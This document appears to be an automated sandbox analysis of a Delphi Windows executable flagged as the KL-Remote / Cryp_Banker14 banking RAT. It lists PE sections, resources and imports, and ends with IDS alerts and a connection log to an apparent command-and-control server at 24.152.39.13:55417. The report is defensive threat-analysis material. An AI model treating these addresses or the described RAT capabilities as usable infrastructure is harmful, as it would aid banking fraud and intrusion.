.text | 0x1000 | 0x4a23cc | 0x4a2400 | f5f8ccda1a307202c6c7962e04af99d2 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0x4a4000 | 0x32b4 | 0x3400 | 28a473619959e8561758d252642b3183 | False | 0.5259164663461539 | data | 6.3031884940201675 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x4a8000 | 0x12a84 | 0x12c00 | 930d0cb7a6adeaccbda21771572e6a2e | False | 0.4514453125 | data | 5.254698117597858 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0x4bb000 | 0x7bac | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x4c3000 | 0x3bcc | 0x3c00 | 2a38558d252082e4fa9717c35f8fe828 | False | 0.3294270833333333 | data | 5.073982386819174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0x4c7000 | 0xcba | 0xe00 | 65241c26d81e8679f0b722e763e353c2 | False | 0.3267299107142857 | data | 4.132414128380479 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0x4c8000 | 0x6d | 0x200 | 58c891240fa923bc27c6a3cdaf9979ad | False | 0.171875 | data | 1.2878106550381676 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0x4c9000 | 0x58 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x4ca000 | 0x5d | 0x200 | 4b43cedfc39507543d7798c37294f9bd | False | 0.189453125 | data | 1.383131954273433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x4cb000 | 0x68d24 | 0x68e00 | e7b8d97ed50e19b38175fa9966b51078 | False | 0.5448194465137068 | data | 6.701719733741433 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0x534000 | 0xb87600 | 0xb87600 | 932cd71749c3e8638c2ec7cd9a23da31 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x535ab0 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635
RT_CURSOR | 0x535be4 | 0x134 | data | English | United States | 0.4642857142857143
RT_CURSOR | 0x535d18 | 0x134 | data | English | United States | 0.4805194805194805
RT_CURSOR | 0x535e4c | 0x134 | data | English | United States | 0.38311688311688313
RT_CURSOR | 0x535f80 | 0x134 | data | English | United States | 0.36038961038961037
RT_CURSOR | 0x5360b4 | 0x134 | data | English | United States | 0.4090909090909091
RT_CURSOR | 0x5361e8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468
RT_ICON | 0x53631c | 0x294 | PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0166666666666666
RT_ICON | 0x5365b0 | 0x2fa | PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced | English | United States | 1.0144356955380578
RT_ICON | 0x5368ac | 0x3ee | PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced | English | United States | 1.010934393638171
RT_ICON | 0x536c9c | 0x596 | PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced | English | United States | 1.0076923076923077
RT_ICON | 0x537234 | 0x6b8 | PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced | English | United States | 1.0063953488372093
RT_ICON | 0x5378ec | 0x81f | PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced | English | United States | 1.0052910052910053
RT_ICON | 0x53810c | 0x9f5 | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0043154178109062
RT_ICON | 0x538b04 | 0x1f1e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9713783580215918
RT_STRING | 0x53aa24 | 0xa4 | data | | | 0.5975609756097561
RT_STRING | 0x53aac8 | 0x52c | data | | | 0.3716012084592145
RT_STRING | 0x53aff4 | 0x598 | data | | | 0.3498603351955307
RT_STRING | 0x53b58c | 0x52c | data | | | 0.23867069486404835
RT_STRING | 0x53bab8 | 0x57c | data | | | 0.297008547008547
RT_STRING | 0x53c034 | 0x4ec | data | | | 0.30873015873015874
RT_STRING | 0x53c520 | 0x494 | data | | | 0.35921501706484643
RT_STRING | 0x53c9b4 | 0x324 | data | | | 0.42039800995024873
RT_STRING | 0x53ccd8 | 0x3c4 | AmigaOS bitmap font "n", fc_YSize 30208, 18688 elements, 2nd "l", 3rd "e" | | | 0.37655601659751037
RT_STRING | 0x53d09c | 0x3cc | data | | | 0.43621399176954734
RT_STRING | 0x53d468 | 0x744 | data | | | 0.27903225806451615
RT_STRING | 0x53dbac | 0x588 | data | | | 0.3114406779661017
RT_STRING | 0x53e134 | 0x474 | data | | | 0.39649122807017545
RT_STRING | 0x53e5a8 | 0x340 | data | | | 0.43509615384615385
RT_STRING | 0x53e8e8 | 0x384 | data | | | 0.41888888888888887
RT_STRING | 0x53ec6c | 0x514 | data | | | 0.3607692307692308
RT_STRING | 0x53f180 | 0x478 | data | | | 0.40646853146853146
RT_STRING | 0x53f5f8 | 0x404 | data | | | 0.3861867704280156
RT_STRING | 0x53f9fc | 0x41c | data | | | 0.34600760456273766
RT_STRING | 0x53fe18 | 0x448 | data | | | 0.33667883211678834
RT_STRING | 0x540260 | 0x57c | data | | | 0.26282051282051283
RT_STRING | 0x5407dc | 0x3a8 | data | | | 0.4091880341880342
RT_STRING | 0x540b84 | 0x574 | data | | | 0.3538681948424069
RT_STRING | 0x5410f8 | 0xae4 | data | | | 0.2654232424677188
RT_STRING | 0x541bdc | 0x844 | data | | | 0.2939508506616257
RT_STRING | 0x542420 | 0xf4c | data | | | 0.21884576098059244
RT_STRING | 0x54336c | 0xb10 | data | | | 0.2891949152542373
RT_STRING | 0x543e7c | 0xa2c | data | | | 0.3248847926267281
RT_STRING | 0x5448a8 | 0x920 | data | | | 0.2833904109589041
RT_STRING | 0x5451c8 | 0x710 | data | | | 0.3008849557522124
RT_STRING | 0x5458d8 | 0x238 | data | | | 0.44190140845070425
RT_STRING | 0x545b10 | 0x3e0 | data | | | 0.39919354838709675
RT_STRING | 0x545ef0 | 0x5b8 | data | | | 0.34904371584699456
RT_STRING | 0x5464a8 | 0x638 | data | | | 0.3806532663316583
RT_STRING | 0x546ae0 | 0x3b0 | data | | | 0.4385593220338983
RT_STRING | 0x546e90 | 0x470 | data | | | 0.3908450704225352
RT_STRING | 0x547300 | 0x344 | data | | | 0.41148325358851673
RT_STRING | 0x547644 | 0x420 | data | | | 0.4015151515151515
RT_STRING | 0x547a64 | 0x39c | data | | | 0.43614718614718617
RT_STRING | 0x547e00 | 0x388 | data | | | 0.38716814159292035
RT_STRING | 0x548188 | 0x364 | data | | | 0.3490783410138249
RT_STRING | 0x5484ec | 0x2c8 | data | | | 0.43820224719101125
RT_STRING | 0x5487b4 | 0x434 | data | | | 0.3736059479553903
RT_STRING | 0x548be8 | 0x384 | data | | | 0.3611111111111111
RT_STRING | 0x548f6c | 0x40c | data | | | 0.4034749034749035
RT_STRING | 0x549378 | 0x120 | data | | | 0.6215277777777778
RT_STRING | 0x549498 | 0xd0 | data | | | 0.6778846153846154
RT_STRING | 0x549568 | 0x198 | data | | | 0.5294117647058824
RT_STRING | 0x549700 | 0x2dc | data | | | 0.45491803278688525
RT_STRING | 0x5499dc | 0x3ac | data | | | 0.39787234042553193
RT_STRING | 0x549d88 | 0x3f4 | data | | | 0.38735177865612647
RT_STRING | 0x54a17c | 0x460 | data | | | 0.3794642857142857
RT_STRING | 0x54a5dc | 0x38c | data | | | 0.30176211453744495
RT_STRING | 0x54a968 | 0x374 | data | | | 0.4253393665158371
RT_STRING | 0x54acdc | 0x3d0 | data | | | 0.4077868852459016
RT_STRING | 0x54b0ac | 0x660 | data | | | 0.3449754901960784
RT_STRING | 0x54b70c | 0x438 | data | | | 0.3685185185185185
RT_STRING | 0x54bb44 | 0x46c | data | | | 0.3197879858657244
RT_STRING | 0x54bfb0 | 0x334 | data | | | 0.4097560975609756
RT_STRING | 0x54c2e4 | 0x328 | data | | | 0.35396039603960394
RT_STRING | 0x54c60c | 0x44c | data | | | 0.3927272727272727
RT_STRING | 0x54ca58 | 0x1ec | data | | | 0.3983739837398374
RT_STRING | 0x54cc44 | 0xc4 | data | | | 0.6428571428571429
RT_STRING | 0x54cd08 | 0x150 | data | | | 0.5744047619047619
RT_STRING | 0x54ce58 | 0x3e8 | data | | | 0.408
RT_STRING | 0x54d240 | 0x498 | data | | | 0.29336734693877553
RT_STRING | 0x54d6d8 | 0x2f8 | data | | | 0.45263157894736844
RT_STRING | 0x54d9d0 | 0x2f0 | data | | | 0.3776595744680851
RT_STRING | 0x54dcc0 | 0x368 | data | | | 0.29243119266055045
RT_RCDATA | 0x54e028 | 0xd5d | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032154340836013
RT_RCDATA | 0x54ed88 | 0xd57 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003221083455344
RT_RCDATA | 0x54fae0 | 0xcfc | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003309265944645
RT_RCDATA | 0x5507dc | 0xcd9 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033444816053512
RT_RCDATA | 0x5514b8 | 0xd5d | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032154340836013
RT_RCDATA | 0x552218 | 0xd57 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003221083455344
RT_RCDATA | 0x552f70 | 0xc4e | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034920634920634
RT_RCDATA | 0x553bc0 | 0xc4e | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034920634920634
RT_RCDATA | 0x554810 | 0xcb5 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033814940055334
RT_RCDATA | 0x5554c8 | 0xcb0 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033866995073892
RT_RCDATA | 0x556178 | 0xd56 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032220269478618
RT_RCDATA | 0x556ed0 | 0xd47 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0032362459546926
RT_RCDATA | 0x557c18 | 0xdc2 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031232254400908
RT_RCDATA | 0x5589dc | 0xdc5 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031205673758865
RT_RCDATA | 0x5597a4 | 0xcf3 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003318250377074
RT_RCDATA | 0x55a498 | 0xced | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033242671501965
RT_RCDATA | 0x55b188 | 0xda9 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031455533314269
RT_RCDATA | 0x55bf34 | 0xda6 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031482541499714
RT_RCDATA | 0x55ccdc | 0xcf3 | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.003318250377074
RT_RCDATA | 0x55d9d0 | 0xced | PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced | English | United States | 1.0033242671501965
RT_RCDATA | 0x55e6c0 | 0x10 | data | | | 1.5
RT_RCDATA | 0x55e6d0 | 0x148b | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0020916524054002
RT_RCDATA | 0x55fb5c | 0x111e | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025102692834322
RT_RCDATA | 0x560c7c | 0xd8c | PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031718569780854
RT_RCDATA | 0x561a08 | 0x1394 | data | | | 0.47186751795690346
RT_RCDATA | 0x562d9c | 0x4 | data | English | United States | 3.0
RT_RCDATA | 0x562da0 | 0xb16 | Delphi compiled form 'TForm1' | | | 0.42353770260747003
RT_RCDATA | 0x5638b8 | 0x947bdb | Delphi compiled form 'TForm2' | | | 0.033049583435058594
RT_RCDATA | 0xeab494 | 0x1601 | Delphi compiled form 'TForm3' | | | 0.307651340315995
RT_RCDATA | 0xeaca98 | 0x20e034 | Delphi compiled form 'TForm4' | | | 0.04551410675048828
RT_GROUP_CURSOR | 0x10baacc | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x10baae0 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25
RT_GROUP_CURSOR | 0x10baaf4 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10bab08 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10bab1c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10bab30 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_CURSOR | 0x10bab44 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3
RT_GROUP_ICON | 0x10bab58 | 0x76 | data | English | United States | 0.7033898305084746
RT_VERSION | 0x10babd0 | 0x204 | data | English | United States | 0.4903100775193798
RT_MANIFEST | 0x10badd4 | 0x70b | XML 1.0 document, ASCII text, with CRLF, LF line terminators | English | United States | 0.403771491957848
DLL | Import
wininet.dll | InternetCloseHandle, InternetReadFile, InternetOpenW, InternetOpenUrlW
winspool.drv | DocumentPropertiesW, ClosePrinter, OpenPrinterW, GetDefaultPrinterW, EnumPrintersW
comctl32.dll | ImageList_GetImageInfo, FlatSB_SetScrollInfo, InitCommonControls, ImageList_DragMove, ImageList_Destroy, _TrackMouseEvent, ImageList_DragShowNolock, ImageList_Add, FlatSB_SetScrollProp, ImageList_GetDragImage, ImageList_Create, ImageList_EndDrag, ImageList_DrawEx, ImageList_SetImageCount, FlatSB_GetScrollPos, FlatSB_SetScrollPos, InitializeFlatSB, ImageList_Copy, FlatSB_GetScrollInfo, ImageList_Write, ImageList_DrawIndirect, ImageList_SetBkColor, ImageList_GetBkColor, ImageList_BeginDrag, ImageList_GetIcon, ImageList_Replace, ImageList_GetImageCount, ImageList_DragEnter, ImageList_GetIconSize, ImageList_SetIconSize, ImageList_Read, ImageList_DragLeave, ImageList_LoadImageW, ImageList_Draw, ImageList_Remove, ImageList_ReplaceIcon, ImageList_SetOverlayImage
shell32.dll | Shell_NotifyIconW, SHAppBarMessage, ShellExecuteW
user32.dll | MoveWindow, CopyImage, SetMenuItemInfoW, GetMenuItemInfoW, DefFrameProcW, GetDlgCtrlID, FrameRect, RegisterWindowMessageW, GetMenuStringW, FillRect, ClipCursor, SendMessageA, IsClipboardFormatAvailable, EnumWindows, ShowOwnedPopups, GetClassInfoW, GetScrollRange, SetActiveWindow, GetActiveWindow, DrawEdge, GetKeyboardLayoutList, LoadBitmapW, EnumChildWindows, GetScrollBarInfo, UnhookWindowsHookEx, SetCapture, GetCapture, ShowCaret, CreatePopupMenu, GetMenuItemID, CharLowerBuffW, PostMessageW, SetWindowLongW, IsZoomed, SetParent, DrawMenuBar, SetSystemCursor, GetClientRect, IsChild, IsIconic, CallNextHookEx, ShowWindow, GetWindowTextW, SetForegroundWindow, GetWindowTextLengthW, IsDialogMessageW, DestroyWindow, RegisterClassW, EndMenu, CharNextW, GetFocus, GetDC, SetFocus, ReleaseDC, mouse_event, GetClassLongW, SetScrollRange, DrawTextW, PeekMessageA, MessageBeep, SetClassLongW, RemovePropW, GetSubMenu, DestroyIcon, IsWindowVisible, DispatchMessageA, UnregisterClassW, GetTopWindow, SendMessageW, LoadStringW, CreateMenu, CharLowerW, SetWindowRgn, SetWindowPos, GetMenuItemCount, GetSysColorBrush, GetWindowDC, DrawTextExW, EnumClipboardFormats, GetScrollInfo, SetWindowTextW, GetMessageExtraInfo, GetSysColor, EnableScrollBar, TrackPopupMenu, keybd_event, DrawIconEx, GetClassNameW, GetMessagePos, GetIconInfo, SetScrollInfo, GetKeyNameTextW, GetDesktopWindow, SetCursorPos, GetCursorPos, SetMenu, GetMenuState, GetMenu, SetRect, GetKeyState, ValidateRect, IsCharAlphaW, GetCursor, KillTimer, BeginDeferWindowPos, WaitMessage, TranslateMDISysAccel, GetWindowPlacement, CreateIconIndirect, CreateWindowExW, GetDCEx, PeekMessageW, MonitorFromWindow, GetUpdateRect, SetTimer, WindowFromPoint, BeginPaint, RegisterClipboardFormatW, MapVirtualKeyW, IsWindowUnicode, DispatchMessageW, CreateAcceleratorTableW, DefMDIChildProcW, GetSystemMenu, SetScrollPos, GetScrollPos, DrawFocusRect, ReleaseCapture, LoadCursorW, ScrollWindow, GetLastActivePopup, GetSystemMetrics, CharUpperBuffW, SetClipboardData, GetClipboardData, ClientToScreen, SetWindowPlacement, GetMonitorInfoW, CheckMenuItem, CharUpperW, DefWindowProcW, GetForegroundWindow, EnableWindow, GetWindowThreadProcessId, RedrawWindow, EndPaint, MsgWaitForMultipleObjectsEx, LoadKeyboardLayoutW, ActivateKeyboardLayout, GetParent, MonitorFromRect, InsertMenuItemW, GetPropW, MessageBoxW, SetPropW, UpdateWindow, MsgWaitForMultipleObjects, VkKeyScanW, DestroyMenu, SetWindowsHookExW, EmptyClipboard, AdjustWindowRectEx, IsWindow, DrawIcon, EnumThreadWindows, InvalidateRect, SetKeyboardState, GetKeyboardState, ScreenToClient, DrawFrameControl, IsCharAlphaNumericW, SetCursor, CreateIcon, RemoveMenu, GetKeyboardLayoutNameW, OpenClipboard, TranslateMessage, MapWindowPoints, EnumDisplayMonitors, CallWindowProcW, CountClipboardFormats, CloseClipboard, DestroyCursor, CopyIcon, PostQuitMessage, ShowScrollBar, EnableMenuItem, DeferWindowPos, HideCaret, EndDeferWindowPos, FindWindowExW, MonitorFromPoint, LoadIconW, SystemParametersInfoW, GetWindow, GetWindowRect, GetWindowLongW, InsertMenuW, IsWindowEnabled, IsDialogMessageA, FindWindowW, GetKeyboardLayout, DeleteMenu
version.dll | GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
oleaut32.dll | SafeArrayPutElement, SafeArrayDestroy, SetErrorInfo, GetErrorInfo, VariantInit, VariantClear, SysFreeString, SafeArrayAccessData, SysReAllocStringLen, SafeArrayCreate, CreateErrorInfo, SafeArrayGetElement, SysAllocStringLen, SafeArrayUnaccessData, SafeArrayPtrOfIndex, SafeArrayGetElemsize, VariantCopy, SafeArrayGetUBound, SafeArrayGetLBound, VariantCopyInd, VariantChangeType, SafeArrayCopy
WTSAPI32.DLL | WTSUnRegisterSessionNotification, WTSRegisterSessionNotification
advapi32.dll | RegSetValueExW, RegConnectRegistryW, RegEnumKeyExW, RegLoadKeyW, RegDeleteKeyW, RegOpenKeyExW, RegQueryInfoKeyW, RegUnLoadKeyW, RegSaveKeyW, RegDeleteValueW, RegReplaceKeyW, RegQueryValueW, RegFlushKey, RegEnumValueW, RegQueryValueExW, RegCloseKey, RegCreateKeyExW, RegRestoreKeyW
msvcrt.dll | memcpy, memset
kernel32.dll | SetFileAttributesW, GetFileTime, GetFileType, QueryDosDeviceW, GetACP, CloseHandle, LocalFree, GetCurrentProcessId, SizeofResource, QueryPerformanceFrequency, IsDebuggerPresent, FindNextFileW, GetFullPathNameW, VirtualFree, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, GlobalSize, RtlUnwind, GetCPInfo, EnumSystemLocalesW, GetStdHandle, GetTimeZoneInformation, FileTimeToLocalFileTime, GetModuleHandleW, FreeLibrary, TryEnterCriticalSection, HeapDestroy, FileTimeToDosDateTime, ReadFile, GetLastError, GetModuleFileNameW, SetLastError, GlobalAlloc, GlobalUnlock, FindResourceW, CreateThread, CompareStringW, CopyFileW, MapViewOfFile, CreateMutexW, LoadLibraryA, GetVolumeInformationW, ResetEvent, MulDiv, FreeResource, GetDriveTypeW, GetVersion, RaiseException, GlobalAddAtomW, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, GetFileAttributesExW, LoadLibraryExW, LockResource, FileTimeToSystemTime, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, GlobalFindAtomW, VirtualQueryEx, GlobalFree, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GlobalDeleteAtom, GetStartupInfoW, GetFileAttributesW, SetCurrentDirectoryW, GetCurrentDirectoryW, InitializeCriticalSection, GetThreadPriority, GetCurrentProcess, SetThreadPriority, GlobalLock, VirtualAlloc, GetTempPathW, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetLogicalDriveStringsW, WinExec, GetVersionExW, VerifyVersionInfoW, HeapCreate, LCMapStringW, GetDiskFreeSpaceW, VerSetConditionMask, FindFirstFileW, GetUserDefaultUILanguage, GetConsoleOutputCP, UnmapViewOfFile, GetConsoleCP, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, GetLocaleInfoW, CreateFileW, EnumResourceNamesW, DeleteFileW, IsDBCSLeadByteEx, GetEnvironmentVariableW, GetLocalTime, WaitForSingleObject, WriteFile, CreateFileMappingW, ExitThread, DeleteCriticalSection, GetDateFormatW, TlsGetValue, SetErrorMode, GetComputerNameW, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, RemoveDirectoryW, CreateEventW, WaitForMultipleObjectsEx, GetThreadLocale, SetThreadLocale
wsock32.dll | gethostbyaddr, WSACleanup, gethostbyname, bind, gethostname, closesocket, WSAGetLastError, connect, inet_addr, getpeername, WSAAsyncSelect, WSAAsyncGetServByName, WSACancelAsyncRequest, send, ntohs, htons, WSAStartup, getservbyname, getsockname, listen, socket, recv, inet_ntoa, ioctlsocket, WSAAsyncGetHostByName
ole32.dll | IsEqualGUID, OleInitialize, OleUninitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID
gdi32.dll | Pie, SetBkMode, CreateCompatibleBitmap, GetEnhMetaFileHeader, RectVisible, AngleArc, ResizePalette, SetAbortProc, SetTextColor, StretchBlt, RoundRect, SelectClipRgn, RestoreDC, SetRectRgn, GetTextMetricsW, GetWindowOrgEx, CreatePalette, PolyBezierTo, CreateICW, CreateDCW, GetStockObject, CreateSolidBrush, Polygon, MoveToEx, PlayEnhMetaFile, Ellipse, StartPage, GetBitmapBits, StartDocW, AbortDoc, GetSystemPaletteEntries, GetEnhMetaFileBits, GetEnhMetaFilePaletteEntries, CreatePenIndirect, CreateFontIndirectW, PolyBezier, EndDoc, GetObjectW, GetWinMetaFileBits, SetROP2, GetEnhMetaFileDescriptionW, ArcTo, Arc, SelectPalette, ExcludeClipRect, MaskBlt, SetWindowOrgEx, EndPage, DeleteEnhMetaFile, Chord, SetDIBits, SetViewportOrgEx, CreateRectRgn, RealizePalette, SetDIBColorTable, GetDIBColorTable, CreateBrushIndirect, PatBlt, SetEnhMetaFileBits, Rectangle, SaveDC, DeleteDC, FrameRgn, BitBlt, GetDeviceCaps, GetTextExtentPoint32W, GetClipBox, IntersectClipRect, Polyline, CreateBitmap, SetWinMetaFileBits, CombineRgn, GetStretchBltMode, CreateDIBitmap, SetStretchBltMode, GetDIBits, CreateDIBSection, LineTo, GetRgnBox, EnumFontsW, CreateHalftonePalette, SelectObject, DeleteObject, ExtFloodFill, UnrealizeObject, CopyEnhMetaFileW, SetBkColor, CreateCompatibleDC, GetBrushOrgEx, GetCurrentPositionEx, GetNearestPaletteIndex, GetTextExtentPointW, ExtTextOutW, SetBrushOrgEx, GetPixel, GdiFlush, SetPixel, EnumFontFamiliesExW, StretchDIBits, GetPaletteEntries
Magnification.dll | MagSetWindowSource, MagInitialize, MagSetImageScalingCallback, MagSetWindowFilterList
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x412dcc
dbkFCallWrapperAddr | 1 | 0x8be644
Language of compilation system | Country where language is spoken | Map
English | United States |


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-19T20:36:17.886678+0100 | 2020315 | ET MALWARE KL-Remote / Cryp_Banker14 RAT connection | 1 | 192.168.2.7 | 49707 | 24.152.39.13 | 55417 | TCP
2024-11-19T20:36:18.601634+0100 | 2020316 | ET MALWARE KL-Remote / Cryp_Banker14 RAT response | 1 | 24.152.39.13 | 55417 | 192.168.2.7 | 49707 | TCP
                              • Total Packets: 25
                              • 55417 undefined
                              • 80 (HTTP)
                              • 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 19, 2024 20:36:12.193453074 CET | 49701 | 80 | 192.168.2.7 | 104.237.62.213
Nov 19, 2024 20:36:12.198350906 CET | 80 | 49701 | 104.237.62.213 | 192.168.2.7
Nov 19, 2024 20:36:12.198424101 CET | 49701 | 80 | 192.168.2.7 | 104.237.62.213
Nov 19, 2024 20:36:12.198534012 CET | 49701 | 80 | 192.168.2.7 | 104.237.62.213
Nov 19, 2024 20:36:12.203464985 CET | 80 | 49701 | 104.237.62.213 | 192.168.2.7
Nov 19, 2024 20:36:12.784324884 CET | 80 | 49701 | 104.237.62.213 | 192.168.2.7
Nov 19, 2024 20:36:12.789654970 CET | 49701 | 80 | 192.168.2.7 | 104.237.62.213
Nov 19, 2024 20:36:12.804812908 CET | 80 | 49701 | 104.237.62.213 | 192.168.2.7
Nov 19, 2024 20:36:12.804873943 CET | 49701 | 80 | 192.168.2.7 | 104.237.62.213
Nov 19, 2024 20:36:14.645380974 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:36:14.650243044 CET | 80 | 49702 | 154.205.156.20 | 192.168.2.7
Nov 19, 2024 20:36:14.650414944 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:36:14.650507927 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:36:14.655545950 CET | 80 | 49702 | 154.205.156.20 | 192.168.2.7
Nov 19, 2024 20:36:15.313024044 CET | 80 | 49702 | 154.205.156.20 | 192.168.2.7
Nov 19, 2024 20:36:15.313102007 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:36:17.545587063 CET | 49705 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:17.557590961 CET | 55417 | 49705 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:17.557662010 CET | 49705 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:17.881633043 CET | 49707 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:17.886504889 CET | 55417 | 49707 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:17.886565924 CET | 49707 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:17.886677980 CET | 49707 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:17.891702890 CET | 55417 | 49707 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:18.601634026 CET | 55417 | 49707 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:18.601947069 CET | 49707 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:18.606892109 CET | 55417 | 49707 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:18.772856951 CET | 55417 | 49707 | 24.152.39.13 | 192.168.2.7
Nov 19, 2024 20:36:18.959151983 CET | 49707 | 55417 | 192.168.2.7 | 24.152.39.13
Nov 19, 2024 20:36:20.317301989 CET | 80 | 49702 | 154.205.156.20 | 192.168.2.7
Nov 19, 2024 20:36:20.317383051 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:04.626252890 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:04.929569006 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:05.537547112 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:06.750593901 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:09.161593914 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Nov 19, 2024 20:38:13.968336105 CET | 49702 | 80 | 192.168.2.7 | 154.205.156.20
Timestamp | Source Port | Dest Port | Source IP | Dest IP
